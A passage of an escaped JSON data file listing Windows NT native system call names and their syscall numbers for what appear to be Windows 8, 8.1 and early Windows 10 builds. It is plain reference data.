\"NtCancelIoFile\": 91, \"NtTraceEvent\": 92, \"NtPowerInformation\": 93, \"NtSetValueKey\": 94, \"NtCancelTimer\": 95, \"NtSetTimer\": 96, \"NtAcceptConnectPort\": 97, \"NtAccessCheck\": 98, \"NtAccessCheckByType\": 99, \"NtAccessCheckByTypeResultList\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 101, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 102, \"NtAddAtomEx\": 103, \"NtAddBootEntry\": 104, \"NtAddDriverEntry\": 105, \"NtAdjustGroupsToken\": 106, \"NtAdjustTokenClaimsAndDeviceGroups\": 107, \"NtAlertResumeThread\": 108, \"NtAlertThread\": 109, \"NtAlertThreadByThreadId\": 110, \"NtAllocateLocallyUniqueId\": 111, \"NtAllocateReserveObject\": 112, \"NtAllocateUserPhysicalPages\": 113, \"NtAllocateUuids\": 114, \"NtAlpcAcceptConnectPort\": 115, \"NtAlpcCancelMessage\": 116, \"NtAlpcConnectPort\": 117, \"NtAlpcConnectPortEx\": 118, \"NtAlpcCreatePort\": 119, \"NtAlpcCreatePortSection\": 120, \"NtAlpcCreateResourceReserve\": 121, \"NtAlpcCreateSectionView\": 122, \"NtAlpcCreateSecurityContext\": 123, \"NtAlpcDeletePortSection\": 124, \"NtAlpcDeleteResourceReserve\": 125, \"NtAlpcDeleteSectionView\": 126, \"NtAlpcDeleteSecurityContext\": 127, \"NtAlpcDisconnectPort\": 128, \"NtAlpcImpersonateClientOfPort\": 129, \"NtAlpcOpenSenderProcess\": 130, \"NtAlpcOpenSenderThread\": 131, \"NtAlpcQueryInformation\": 132, \"NtAlpcQueryInformationMessage\": 133, \"NtAlpcRevokeSecurityContext\": 134, \"NtAlpcSendWaitReceivePort\": 135, \"NtAlpcSetInformation\": 136, \"NtAreMappedFilesTheSame\": 137, \"NtAssignProcessToJobObject\": 138, \"NtAssociateWaitCompletionPacket\": 139, \"NtCancelIoFileEx\": 140, \"NtCancelSynchronousIoFile\": 141, \"NtCancelWaitCompletionPacket\": 142, \"NtCommitComplete\": 143, \"NtCommitEnlistment\": 144, \"NtCommitTransaction\": 145, \"NtCompactKeys\": 146, \"NtCompareTokens\": 147, \"NtCompleteConnectPort\": 148, \"NtCompressKey\": 149, \"NtConnectPort\": 150, \"NtCreateDebugObject\": 151, \"NtCreateDirectoryObject\": 152, \"NtCreateDirectoryObjectEx\": 153, \"NtCreateEnlistment\": 154, \"NtCreateEventPair\": 155, \"NtCreateIRTimer\": 156, \"NtCreateIoCompletion\": 157, \"NtCreateJobObject\": 158, \"NtCreateJobSet\": 159, \"NtCreateKeyTransacted\": 160, \"NtCreateKeyedEvent\": 161, \"NtCreateLowBoxToken\": 162, \"NtCreateMailslotFile\": 163, \"NtCreateMutant\": 164, \"NtCreateNamedPipeFile\": 165, \"NtCreatePagingFile\": 166, \"NtCreatePort\": 167, \"NtCreatePrivateNamespace\": 168, \"NtCreateProcess\": 169, \"NtCreateProfile\": 170, \"NtCreateProfileEx\": 171, \"NtCreateResourceManager\": 172, \"NtCreateSemaphore\": 173, \"NtCreateSymbolicLinkObject\": 174, \"NtCreateThreadEx\": 175, \"NtCreateTimer\": 176, \"NtCreateToken\": 177, \"NtCreateTokenEx\": 178, \"NtCreateTransaction\": 179, \"NtCreateTransactionManager\": 180, \"NtCreateUserProcess\": 181, \"NtCreateWaitCompletionPacket\": 182, \"NtCreateWaitablePort\": 183, \"NtCreateWnfStateName\": 184, \"NtCreateWorkerFactory\": 185, \"NtDebugActiveProcess\": 186, \"NtDebugContinue\": 187, \"NtDeleteAtom\": 188, \"NtDeleteBootEntry\": 189, \"NtDeleteDriverEntry\": 190, \"NtDeleteFile\": 191, \"NtDeleteKey\": 192, \"NtDeleteObjectAuditAlarm\": 193, \"NtDeletePrivateNamespace\": 194, \"NtDeleteValueKey\": 195, \"NtDeleteWnfStateData\": 196, \"NtDeleteWnfStateName\": 197, \"NtDisableLastKnownGood\": 198, \"NtDisplayString\": 199, \"NtDrawText\": 200, \"NtEnableLastKnownGood\": 201, \"NtEnumerateBootEntries\": 202, \"NtEnumerateDriverEntries\": 203, \"NtEnumerateSystemEnvironmentValuesEx\": 204, \"NtEnumerateTransactionObject\": 205, \"NtExtendSection\": 206, \"NtFilterBootOption\": 207, \"NtFilterToken\": 208, \"NtFilterTokenEx\": 209, \"NtFlushBuffersFileEx\": 210, \"NtFlushInstallUILanguage\": 211, \"NtFlushInstructionCache\": 212, \"NtFlushKey\": 213, \"NtFlushProcessWriteBuffers\": 214, \"NtFlushVirtualMemory\": 215, \"NtFlushWriteBuffer\": 216, \"NtFreeUserPhysicalPages\": 217, \"NtFreezeRegistry\": 218, \"NtFreezeTransactions\": 219, \"NtGetCachedSigningLevel\": 220, \"NtGetContextThread\": 221, \"NtGetCurrentProcessorNumber\": 222, \"NtGetDevicePowerState\": 223, \"NtGetMUIRegistryInfo\": 224, \"NtGetNextProcess\": 225, \"NtGetNextThread\": 226, \"NtGetNlsSectionPtr\": 227, \"NtGetNotificationResourceManager\": 228, \"NtGetWriteWatch\": 229, \"NtImpersonateAnonymousToken\": 230, \"NtImpersonateThread\": 231, \"NtInitializeNlsFiles\": 232, \"NtInitializeRegistry\": 233, \"NtInitiatePowerAction\": 234, \"NtIsSystemResumeAutomatic\": 235, \"NtIsUILanguageComitted\": 236, \"NtListenPort\": 237, \"NtLoadDriver\": 238, \"NtLoadKey\": 239, \"NtLoadKey2\": 240, \"NtLoadKeyEx\": 241, \"NtLockFile\": 242, \"NtLockProductActivationKeys\": 243, \"NtLockRegistryKey\": 244, \"NtLockVirtualMemory\": 245, \"NtMakePermanentObject\": 246, \"NtMakeTemporaryObject\": 247, \"NtMapCMFModule\": 248, \"NtMapUserPhysicalPages\": 249, \"NtModifyBootEntry\": 250, \"NtModifyDriverEntry\": 251, \"NtNotifyChangeDirectoryFile\": 252, \"NtNotifyChangeKey\": 253, \"NtNotifyChangeMultipleKeys\": 254, \"NtNotifyChangeSession\": 255, \"NtOpenEnlistment\": 256, \"NtOpenEventPair\": 257, \"NtOpenIoCompletion\": 258, \"NtOpenJobObject\": 259, \"NtOpenKeyEx\": 260, \"NtOpenKeyTransacted\": 261, \"NtOpenKeyTransactedEx\": 262, \"NtOpenKeyedEvent\": 263, \"NtOpenMutant\": 264, \"NtOpenObjectAuditAlarm\": 265, \"NtOpenPrivateNamespace\": 266, \"NtOpenProcessToken\": 267, \"NtOpenResourceManager\": 268, \"NtOpenSemaphore\": 269, \"NtOpenSession\": 270, \"NtOpenSymbolicLinkObject\": 271, \"NtOpenThread\": 272, \"NtOpenTimer\": 273, \"NtOpenTransaction\": 274, \"NtOpenTransactionManager\": 275, \"NtPlugPlayControl\": 276, \"NtPrePrepareComplete\": 277, \"NtPrePrepareEnlistment\": 278, \"NtPrepareComplete\": 279, \"NtPrepareEnlistment\": 280, \"NtPrivilegeCheck\": 281, \"NtPrivilegeObjectAuditAlarm\": 282, \"NtPrivilegedServiceAuditAlarm\": 283, \"NtPropagationComplete\": 284, \"NtPropagationFailed\": 285, \"NtPulseEvent\": 286, \"NtQueryBootEntryOrder\": 287, \"NtQueryBootOptions\": 288, \"NtQueryDebugFilterState\": 289, \"NtQueryDirectoryObject\": 290, \"NtQueryDriverEntryOrder\": 291, \"NtQueryEaFile\": 292, \"NtQueryFullAttributesFile\": 293, \"NtQueryInformationAtom\": 294, \"NtQueryInformationEnlistment\": 295, \"NtQueryInformationJobObject\": 296, \"NtQueryInformationPort\": 297, \"NtQueryInformationResourceManager\": 298, \"NtQueryInformationTransaction\": 299, \"NtQueryInformationTransactionManager\": 300, \"NtQueryInformationWorkerFactory\": 301, \"NtQueryInstallUILanguage\": 302, \"NtQueryIntervalProfile\": 303, \"NtQueryIoCompletion\": 304, \"NtQueryLicenseValue\": 305, \"NtQueryMultipleValueKey\": 306, \"NtQueryMutant\": 307, \"NtQueryOpenSubKeys\": 308, \"NtQueryOpenSubKeysEx\": 309, \"NtQueryPortInformationProcess\": 310, \"NtQueryQuotaInformationFile\": 311, \"NtQuerySecurityAttributesToken\": 312, \"NtQuerySecurityObject\": 313, \"NtQuerySemaphore\": 314, \"NtQuerySymbolicLinkObject\": 315, \"NtQuerySystemEnvironmentValue\": 316, \"NtQuerySystemEnvironmentValueEx\": 317, \"NtQuerySystemInformationEx\": 318, \"NtQueryTimerResolution\": 319, \"NtQueryWnfStateData\": 320, \"NtQueryWnfStateNameInformation\": 321, \"NtQueueApcThreadEx\": 322, \"NtRaiseException\": 323, \"NtRaiseHardError\": 324, \"NtReadOnlyEnlistment\": 325, \"NtRecoverEnlistment\": 326, \"NtRecoverResourceManager\": 327, \"NtRecoverTransactionManager\": 328, \"NtRegisterProtocolAddressInformation\": 329, \"NtRegisterThreadTerminatePort\": 330, \"NtReleaseKeyedEvent\": 331, \"NtReleaseWorkerFactoryWorker\": 332, \"NtRemoveIoCompletionEx\": 333, \"NtRemoveProcessDebug\": 334, \"NtRenameKey\": 335, \"NtRenameTransactionManager\": 336, \"NtReplaceKey\": 337, \"NtReplacePartitionUnit\": 338, \"NtReplyWaitReplyPort\": 339, \"NtRequestPort\": 340, \"NtResetEvent\": 341, \"NtResetWriteWatch\": 342, \"NtRestoreKey\": 343, \"NtResumeProcess\": 344, \"NtRollbackComplete\": 345, \"NtRollbackEnlistment\": 346, \"NtRollbackTransaction\": 347, \"NtRollforwardTransactionManager\": 348, \"NtSaveKey\": 349, \"NtSaveKeyEx\": 350, \"NtSaveMergedKeys\": 351, \"NtSecureConnectPort\": 352, \"NtSerializeBoot\": 353, \"NtSetBootEntryOrder\": 354, \"NtSetBootOptions\": 355, \"NtSetCachedSigningLevel\": 356, \"NtSetContextThread\": 357, \"NtSetDebugFilterState\": 358, \"NtSetDefaultHardErrorPort\": 359, \"NtSetDefaultLocale\": 360, \"NtSetDefaultUILanguage\": 361, \"NtSetDriverEntryOrder\": 362, \"NtSetEaFile\": 363, \"NtSetHighEventPair\": 364, \"NtSetHighWaitLowEventPair\": 365, \"NtSetIRTimer\": 366, \"NtSetInformationDebugObject\": 367, \"NtSetInformationEnlistment\": 368, \"NtSetInformationJobObject\": 369, \"NtSetInformationKey\": 370, \"NtSetInformationResourceManager\": 371, \"NtSetInformationToken\": 372, \"NtSetInformationTransaction\": 373, \"NtSetInformationTransactionManager\": 374, \"NtSetInformationVirtualMemory\": 375, \"NtSetInformationWorkerFactory\": 376, \"NtSetIntervalProfile\": 377, \"NtSetIoCompletion\": 378, \"NtSetIoCompletionEx\": 379, \"NtSetLdtEntries\": 380, \"NtSetLowEventPair\": 381, \"NtSetLowWaitHighEventPair\": 382, \"NtSetQuotaInformationFile\": 383, \"NtSetSecurityObject\": 384, \"NtSetSystemEnvironmentValue\": 385, \"NtSetSystemEnvironmentValueEx\": 386, \"NtSetSystemInformation\": 387, \"NtSetSystemPowerState\": 388, \"NtSetSystemTime\": 389, \"NtSetThreadExecutionState\": 390, \"NtSetTimerEx\": 391, \"NtSetTimerResolution\": 392, \"NtSetUuidSeed\": 393, \"NtSetVolumeInformationFile\": 394, \"NtShutdownSystem\": 395, \"NtShutdownWorkerFactory\": 396, \"NtSignalAndWaitForSingleObject\": 397, \"NtSinglePhaseReject\": 398, \"NtStartProfile\": 399, \"NtStopProfile\": 400, \"NtSubscribeWnfStateChange\": 401, \"NtSuspendProcess\": 402, \"NtSuspendThread\": 403, \"NtSystemDebugControl\": 404, \"NtTerminateJobObject\": 405, \"NtTestAlert\": 406, \"NtThawRegistry\": 407, \"NtThawTransactions\": 408, \"NtTraceControl\": 409, \"NtTranslateFilePath\": 410, \"NtUmsThreadYield\": 411, \"NtUnloadDriver\": 412, \"NtUnloadKey\": 413, \"NtUnloadKey2\": 414, \"NtUnloadKeyEx\": 415, \"NtUnlockFile\": 416, \"NtUnlockVirtualMemory\": 417, \"NtUnmapViewOfSectionEx\": 418, \"NtUnsubscribeWnfStateChange\": 419, \"NtUpdateWnfStateData\": 420, \"NtVdmControl\": 421, \"NtWaitForAlertByThreadId\": 422, \"NtWaitForDebugEvent\": 423, \"NtWaitForKeyedEvent\": 424, \"NtWaitForWnfNotifications\": 425, \"NtWaitForWorkViaWorkerFactory\": 426, \"NtWaitHighEventPair\": 427, \"NtWaitLowEventPair\": 428}, \"8.1\": {\"NtWorkerFactoryWorkerReady\": 0, \"NtAcceptConnectPort\": 1, \"NtMapUserPhysicalPagesScatter\": 2, \"NtWaitForSingleObject\": 3, \"NtCallbackReturn\": 4, \"NtReadFile\": 5, \"NtDeviceIoControlFile\": 6, \"NtWriteFile\": 7, \"NtRemoveIoCompletion\": 8, \"NtReleaseSemaphore\": 9, \"NtReplyWaitReceivePort\": 10, \"NtReplyPort\": 11, \"NtSetInformationThread\": 12, \"NtSetEvent\": 13, \"NtClose\": 14, \"NtQueryObject\": 15, \"NtQueryInformationFile\": 16, \"NtOpenKey\": 17, \"NtEnumerateValueKey\": 18, \"NtFindAtom\": 19, \"NtQueryDefaultLocale\": 20, \"NtQueryKey\": 21, \"NtQueryValueKey\": 22, \"NtAllocateVirtualMemory\": 23, \"NtQueryInformationProcess\": 24, \"NtWaitForMultipleObjects32\": 25, \"NtWriteFileGather\": 26, \"NtSetInformationProcess\": 27, \"NtCreateKey\": 28, \"NtFreeVirtualMemory\": 29, \"NtImpersonateClientOfPort\": 30, \"NtReleaseMutant\": 31, \"NtQueryInformationToken\": 32, \"NtRequestWaitReplyPort\": 33, \"NtQueryVirtualMemory\": 34, \"NtOpenThreadToken\": 35, \"NtQueryInformationThread\": 36, \"NtOpenProcess\": 37, \"NtSetInformationFile\": 38, \"NtMapViewOfSection\": 39, \"NtAccessCheckAndAuditAlarm\": 40, \"NtUnmapViewOfSection\": 41, \"NtReplyWaitReceivePortEx\": 42, \"NtTerminateProcess\": 43, \"NtSetEventBoostPriority\": 44, \"NtReadFileScatter\": 45, \"NtOpenThreadTokenEx\": 46, \"NtOpenProcessTokenEx\": 47, \"NtQueryPerformanceCounter\": 48, \"NtEnumerateKey\": 49, \"NtOpenFile\": 50, \"NtDelayExecution\": 51, \"NtQueryDirectoryFile\": 52, \"NtQuerySystemInformation\": 53, \"NtOpenSection\": 54, \"NtQueryTimer\": 55, \"NtFsControlFile\": 56, \"NtWriteVirtualMemory\": 57, \"NtCloseObjectAuditAlarm\": 58, \"NtDuplicateObject\": 59, \"NtQueryAttributesFile\": 60, \"NtClearEvent\": 61, \"NtReadVirtualMemory\": 62, \"NtOpenEvent\": 63, \"NtAdjustPrivilegesToken\": 64, \"NtDuplicateToken\": 65, \"NtContinue\": 66, \"NtQueryDefaultUILanguage\": 67, \"NtQueueApcThread\": 68, \"NtYieldExecution\": 69, \"NtAddAtom\": 70, \"NtCreateEvent\": 71, \"NtQueryVolumeInformationFile\": 72, \"NtCreateSection\": 73, \"NtFlushBuffersFile\": 74, \"NtApphelpCacheControl\": 75, \"NtCreateProcessEx\": 76, \"NtCreateThread\": 77, \"NtIsProcessInJob\": 78, \"NtProtectVirtualMemory\": 79, \"NtQuerySection\": 80, \"NtResumeThread\": 81, \"NtTerminateThread\": 82, \"NtReadRequestData\": 83, \"NtCreateFile\": 84, \"NtQueryEvent\": 85, \"NtWriteRequestData\": 86, \"NtOpenDirectoryObject\": 87, \"NtAccessCheckByTypeAndAuditAlarm\": 88, \"NtQuerySystemTime\": 89, \"NtWaitForMultipleObjects\": 90, \"NtSetInformationObject\": 91, \"NtCancelIoFile\": 92, \"NtTraceEvent\": 93, \"NtPowerInformation\": 94, \"NtSetValueKey\": 95, \"NtCancelTimer\": 96, \"NtSetTimer\": 97, \"NtAccessCheck\": 98, \"NtAccessCheckByType\": 99, \"NtAccessCheckByTypeResultList\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 101, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 102, \"NtAddAtomEx\": 103, \"NtAddBootEntry\": 104, \"NtAddDriverEntry\": 105, \"NtAdjustGroupsToken\": 106, \"NtAdjustTokenClaimsAndDeviceGroups\": 107, \"NtAlertResumeThread\": 108, \"NtAlertThread\": 109, \"NtAlertThreadByThreadId\": 110, \"NtAllocateLocallyUniqueId\": 111, \"NtAllocateReserveObject\": 112, \"NtAllocateUserPhysicalPages\": 113, \"NtAllocateUuids\": 114, \"NtAlpcAcceptConnectPort\": 115, \"NtAlpcCancelMessage\": 116, \"NtAlpcConnectPort\": 117, \"NtAlpcConnectPortEx\": 118, \"NtAlpcCreatePort\": 119, \"NtAlpcCreatePortSection\": 120, \"NtAlpcCreateResourceReserve\": 121, \"NtAlpcCreateSectionView\": 122, \"NtAlpcCreateSecurityContext\": 123, \"NtAlpcDeletePortSection\": 124, \"NtAlpcDeleteResourceReserve\": 125, \"NtAlpcDeleteSectionView\": 126, \"NtAlpcDeleteSecurityContext\": 127, \"NtAlpcDisconnectPort\": 128, \"NtAlpcImpersonateClientOfPort\": 129, \"NtAlpcOpenSenderProcess\": 130, \"NtAlpcOpenSenderThread\": 131, \"NtAlpcQueryInformation\": 132, \"NtAlpcQueryInformationMessage\": 133, \"NtAlpcRevokeSecurityContext\": 134, \"NtAlpcSendWaitReceivePort\": 135, \"NtAlpcSetInformation\": 136, \"NtAreMappedFilesTheSame\": 137, \"NtAssignProcessToJobObject\": 138, \"NtAssociateWaitCompletionPacket\": 139, \"NtCancelIoFileEx\": 140, \"NtCancelSynchronousIoFile\": 141, \"NtCancelTimer2\": 142, \"NtCancelWaitCompletionPacket\": 143, \"NtCommitComplete\": 144, \"NtCommitEnlistment\": 145, \"NtCommitTransaction\": 146, \"NtCompactKeys\": 147, \"NtCompareTokens\": 148, \"NtCompleteConnectPort\": 149, \"NtCompressKey\": 150, \"NtConnectPort\": 151, \"NtCreateDebugObject\": 152, \"NtCreateDirectoryObject\": 153, \"NtCreateDirectoryObjectEx\": 154, \"NtCreateEnlistment\": 155, \"NtCreateEventPair\": 156, \"NtCreateIRTimer\": 157, \"NtCreateIoCompletion\": 158, \"NtCreateJobObject\": 159, \"NtCreateJobSet\": 160, \"NtCreateKeyTransacted\": 161, \"NtCreateKeyedEvent\": 162, \"NtCreateLowBoxToken\": 163, \"NtCreateMailslotFile\": 164, \"NtCreateMutant\": 165, \"NtCreateNamedPipeFile\": 166, \"NtCreatePagingFile\": 167, \"NtCreatePort\": 168, \"NtCreatePrivateNamespace\": 169, \"NtCreateProcess\": 170, \"NtCreateProfile\": 171, \"NtCreateProfileEx\": 172, \"NtCreateResourceManager\": 173, \"NtCreateSemaphore\": 174, \"NtCreateSymbolicLinkObject\": 175, \"NtCreateThreadEx\": 176, \"NtCreateTimer\": 177, \"NtCreateTimer2\": 178, \"NtCreateToken\": 179, \"NtCreateTokenEx\": 180, \"NtCreateTransaction\": 181, \"NtCreateTransactionManager\": 182, \"NtCreateUserProcess\": 183, \"NtCreateWaitCompletionPacket\": 184, \"NtCreateWaitablePort\": 185, \"NtCreateWnfStateName\": 186, \"NtCreateWorkerFactory\": 187, \"NtDebugActiveProcess\": 188, \"NtDebugContinue\": 189, \"NtDeleteAtom\": 190, \"NtDeleteBootEntry\": 191, \"NtDeleteDriverEntry\": 192, \"NtDeleteFile\": 193, \"NtDeleteKey\": 194, \"NtDeleteObjectAuditAlarm\": 195, \"NtDeletePrivateNamespace\": 196, \"NtDeleteValueKey\": 197, \"NtDeleteWnfStateData\": 198, \"NtDeleteWnfStateName\": 199, \"NtDisableLastKnownGood\": 200, \"NtDisplayString\": 201, \"NtDrawText\": 202, \"NtEnableLastKnownGood\": 203, \"NtEnumerateBootEntries\": 204, \"NtEnumerateDriverEntries\": 205, \"NtEnumerateSystemEnvironmentValuesEx\": 206, \"NtEnumerateTransactionObject\": 207, \"NtExtendSection\": 208, \"NtFilterBootOption\": 209, \"NtFilterToken\": 210, \"NtFilterTokenEx\": 211, \"NtFlushBuffersFileEx\": 212, \"NtFlushInstallUILanguage\": 213, \"NtFlushInstructionCache\": 214, \"NtFlushKey\": 215, \"NtFlushProcessWriteBuffers\": 216, \"NtFlushVirtualMemory\": 217, \"NtFlushWriteBuffer\": 218, \"NtFreeUserPhysicalPages\": 219, \"NtFreezeRegistry\": 220, \"NtFreezeTransactions\": 221, \"NtGetCachedSigningLevel\": 222, \"NtGetCompleteWnfStateSubscription\": 223, \"NtGetContextThread\": 224, \"NtGetCurrentProcessorNumber\": 225, \"NtGetDevicePowerState\": 226, \"NtGetMUIRegistryInfo\": 227, \"NtGetNextProcess\": 228, \"NtGetNextThread\": 229, \"NtGetNlsSectionPtr\": 230, \"NtGetNotificationResourceManager\": 231, \"NtGetWriteWatch\": 232, \"NtImpersonateAnonymousToken\": 233, \"NtImpersonateThread\": 234, \"NtInitializeNlsFiles\": 235, \"NtInitializeRegistry\": 236, \"NtInitiatePowerAction\": 237, \"NtIsSystemResumeAutomatic\": 238, \"NtIsUILanguageComitted\": 239, \"NtListenPort\": 240, \"NtLoadDriver\": 241, \"NtLoadKey\": 242, \"NtLoadKey2\": 243, \"NtLoadKeyEx\": 244, \"NtLockFile\": 245, \"NtLockProductActivationKeys\": 246, \"NtLockRegistryKey\": 247, \"NtLockVirtualMemory\": 248, \"NtMakePermanentObject\": 249, \"NtMakeTemporaryObject\": 250, \"NtMapCMFModule\": 251, \"NtMapUserPhysicalPages\": 252, \"NtModifyBootEntry\": 253, \"NtModifyDriverEntry\": 254, \"NtNotifyChangeDirectoryFile\": 255, \"NtNotifyChangeKey\": 256, \"NtNotifyChangeMultipleKeys\": 257, \"NtNotifyChangeSession\": 258, \"NtOpenEnlistment\": 259, \"NtOpenEventPair\": 260, \"NtOpenIoCompletion\": 261, \"NtOpenJobObject\": 262, \"NtOpenKeyEx\": 263, \"NtOpenKeyTransacted\": 264, \"NtOpenKeyTransactedEx\": 265, \"NtOpenKeyedEvent\": 266, \"NtOpenMutant\": 267, \"NtOpenObjectAuditAlarm\": 268, \"NtOpenPrivateNamespace\": 269, \"NtOpenProcessToken\": 270, \"NtOpenResourceManager\": 271, \"NtOpenSemaphore\": 272, \"NtOpenSession\": 273, \"NtOpenSymbolicLinkObject\": 274, \"NtOpenThread\": 275, \"NtOpenTimer\": 276, \"NtOpenTransaction\": 277, \"NtOpenTransactionManager\": 278, \"NtPlugPlayControl\": 279, \"NtPrePrepareComplete\": 280, \"NtPrePrepareEnlistment\": 281, \"NtPrepareComplete\": 282, \"NtPrepareEnlistment\": 283, \"NtPrivilegeCheck\": 284, \"NtPrivilegeObjectAuditAlarm\": 285, \"NtPrivilegedServiceAuditAlarm\": 286, \"NtPropagationComplete\": 287, \"NtPropagationFailed\": 288, \"NtPulseEvent\": 289, \"NtQueryBootEntryOrder\": 290, \"NtQueryBootOptions\": 291, \"NtQueryDebugFilterState\": 292, \"NtQueryDirectoryObject\": 293, \"NtQueryDriverEntryOrder\": 294, \"NtQueryEaFile\": 295, \"NtQueryFullAttributesFile\": 296, \"NtQueryInformationAtom\": 297, \"NtQueryInformationEnlistment\": 298, \"NtQueryInformationJobObject\": 299, \"NtQueryInformationPort\": 300, \"NtQueryInformationResourceManager\": 301, \"NtQueryInformationTransaction\": 302, \"NtQueryInformationTransactionManager\": 303, \"NtQueryInformationWorkerFactory\": 304, \"NtQueryInstallUILanguage\": 305, \"NtQueryIntervalProfile\": 306, \"NtQueryIoCompletion\": 307, \"NtQueryLicenseValue\": 308, \"NtQueryMultipleValueKey\": 309, \"NtQueryMutant\": 310, \"NtQueryOpenSubKeys\": 311, \"NtQueryOpenSubKeysEx\": 312, \"NtQueryPortInformationProcess\": 313, \"NtQueryQuotaInformationFile\": 314, \"NtQuerySecurityAttributesToken\": 315, \"NtQuerySecurityObject\": 316, \"NtQuerySemaphore\": 317, \"NtQuerySymbolicLinkObject\": 318, \"NtQuerySystemEnvironmentValue\": 319, \"NtQuerySystemEnvironmentValueEx\": 320, \"NtQuerySystemInformationEx\": 321, \"NtQueryTimerResolution\": 322, \"NtQueryWnfStateData\": 323, \"NtQueryWnfStateNameInformation\": 324, \"NtQueueApcThreadEx\": 325, \"NtRaiseException\": 326, \"NtRaiseHardError\": 327, \"NtReadOnlyEnlistment\": 328, \"NtRecoverEnlistment\": 329, \"NtRecoverResourceManager\": 330, \"NtRecoverTransactionManager\": 331, \"NtRegisterProtocolAddressInformation\": 332, \"NtRegisterThreadTerminatePort\": 333, \"NtReleaseKeyedEvent\": 334, \"NtReleaseWorkerFactoryWorker\": 335, \"NtRemoveIoCompletionEx\": 336, \"NtRemoveProcessDebug\": 337, \"NtRenameKey\": 338, \"NtRenameTransactionManager\": 339, \"NtReplaceKey\": 340, \"NtReplacePartitionUnit\": 341, \"NtReplyWaitReplyPort\": 342, \"NtRequestPort\": 343, \"NtResetEvent\": 344, \"NtResetWriteWatch\": 345, \"NtRestoreKey\": 346, \"NtResumeProcess\": 347, \"NtRollbackComplete\": 348, \"NtRollbackEnlistment\": 349, \"NtRollbackTransaction\": 350, \"NtRollforwardTransactionManager\": 351, \"NtSaveKey\": 352, \"NtSaveKeyEx\": 353, \"NtSaveMergedKeys\": 354, \"NtSecureConnectPort\": 355, \"NtSerializeBoot\": 356, \"NtSetBootEntryOrder\": 357, \"NtSetBootOptions\": 358, \"NtSetCachedSigningLevel\": 359, \"NtSetContextThread\": 360, \"NtSetDebugFilterState\": 361, \"NtSetDefaultHardErrorPort\": 362, \"NtSetDefaultLocale\": 363, \"NtSetDefaultUILanguage\": 364, \"NtSetDriverEntryOrder\": 365, \"NtSetEaFile\": 366, \"NtSetHighEventPair\": 367, \"NtSetHighWaitLowEventPair\": 368, \"NtSetIRTimer\": 369, \"NtSetInformationDebugObject\": 370, \"NtSetInformationEnlistment\": 371, \"NtSetInformationJobObject\": 372, \"NtSetInformationKey\": 373, \"NtSetInformationResourceManager\": 374, \"NtSetInformationToken\": 375, \"NtSetInformationTransaction\": 376, \"NtSetInformationTransactionManager\": 377, \"NtSetInformationVirtualMemory\": 378, \"NtSetInformationWorkerFactory\": 379, \"NtSetIntervalProfile\": 380, \"NtSetIoCompletion\": 381, \"NtSetIoCompletionEx\": 382, \"NtSetLdtEntries\": 383, \"NtSetLowEventPair\": 384, \"NtSetLowWaitHighEventPair\": 385, \"NtSetQuotaInformationFile\": 386, \"NtSetSecurityObject\": 387, \"NtSetSystemEnvironmentValue\": 388, \"NtSetSystemEnvironmentValueEx\": 389, \"NtSetSystemInformation\": 390, \"NtSetSystemPowerState\": 391, \"NtSetSystemTime\": 392, \"NtSetThreadExecutionState\": 393, \"NtSetTimer2\": 394, \"NtSetTimerEx\": 395, \"NtSetTimerResolution\": 396, \"NtSetUuidSeed\": 397, \"NtSetVolumeInformationFile\": 398, \"NtSetWnfProcessNotificationEvent\": 399, \"NtShutdownSystem\": 400, \"NtShutdownWorkerFactory\": 401, \"NtSignalAndWaitForSingleObject\": 402, \"NtSinglePhaseReject\": 403, \"NtStartProfile\": 404, \"NtStopProfile\": 405, \"NtSubscribeWnfStateChange\": 406, \"NtSuspendProcess\": 407, \"NtSuspendThread\": 408, \"NtSystemDebugControl\": 409, \"NtTerminateJobObject\": 410, \"NtTestAlert\": 411, \"NtThawRegistry\": 412, \"NtThawTransactions\": 413, \"NtTraceControl\": 414, \"NtTranslateFilePath\": 415, \"NtUmsThreadYield\": 416, \"NtUnloadDriver\": 417, \"NtUnloadKey\": 418, \"NtUnloadKey2\": 419, \"NtUnloadKeyEx\": 420, \"NtUnlockFile\": 421, \"NtUnlockVirtualMemory\": 422, \"NtUnmapViewOfSectionEx\": 423, \"NtUnsubscribeWnfStateChange\": 424, \"NtUpdateWnfStateData\": 425, \"NtVdmControl\": 426, \"NtWaitForAlertByThreadId\": 427, \"NtWaitForDebugEvent\": 428, \"NtWaitForKeyedEvent\": 429, \"NtWaitForWorkViaWorkerFactory\": 430, \"NtWaitHighEventPair\": 431, \"NtWaitLowEventPair\": 432}}, \"Windows 10\": {\"1507\": {\"NtAccessCheck\": 0, \"NtWorkerFactoryWorkerReady\": 1, \"NtAcceptConnectPort\": 2, \"NtMapUserPhysicalPagesScatter\": 3, \"NtWaitForSingleObject\": 4, \"NtCallbackReturn\": 5, \"NtReadFile\": 6, \"NtDeviceIoControlFile\": 7, \"NtWriteFile\": 8, \"NtRemoveIoCompletion\": 9, \"NtReleaseSemaphore\": 10, \"NtReplyWaitReceivePort\": 11, \"NtReplyPort\": 12, \"NtSetInformationThread\": 13, \"NtSetEvent\": 14, \"NtClose\": 15, \"NtQueryObject\": 16, \"NtQueryInformationFile\": 17, \"NtOpenKey\": 18, \"NtEnumerateValueKey\": 19, \"NtFindAtom\": 20, \"NtQueryDefaultLocale\": 21, \"NtQueryKey\": 22, \"NtQueryValueKey\": 23, \"NtAllocateVirtualMemory\": 24, \"NtQueryInformationProcess\": 25, \"NtWaitForMultipleObjects32\": 26, \"NtWriteFileGather\": 27, \"NtSetInformationProcess\": 28, \"NtCreateKey\": 29, \"NtFreeVirtualMemory\": 30, \"NtImpersonateClientOfPort\": 31, \"NtReleaseMutant\": 32, \"NtQueryInformationToken\": 33, \"NtRequestWaitReplyPort\": 34, \"NtQueryVirtualMemory\": 35, \"NtOpenThreadToken\": 36, \"NtQueryInformationThread\": 37, \"NtOpenProcess\": 38, \"NtSetInformationFile\": 39, \"NtMapViewOfSection\": 40, \"NtAccessCheckAndAuditAlarm\": 41, \"NtUnmapViewOfSection\": 42, \"NtReplyWaitReceivePortEx\": 43, \"NtTerminateProcess\": 44, \"NtSetEventBoostPriority\": 45, \"NtReadFileScatter\": 46, \"NtOpenThreadTokenEx\": 47, \"NtOpenProcessTokenEx\": 48, \"NtQueryPerformanceCounter\": 49, \"NtEnumerateKey\": 50, \"NtOpenFile\": 51, \"NtDelayExecution\": 52, 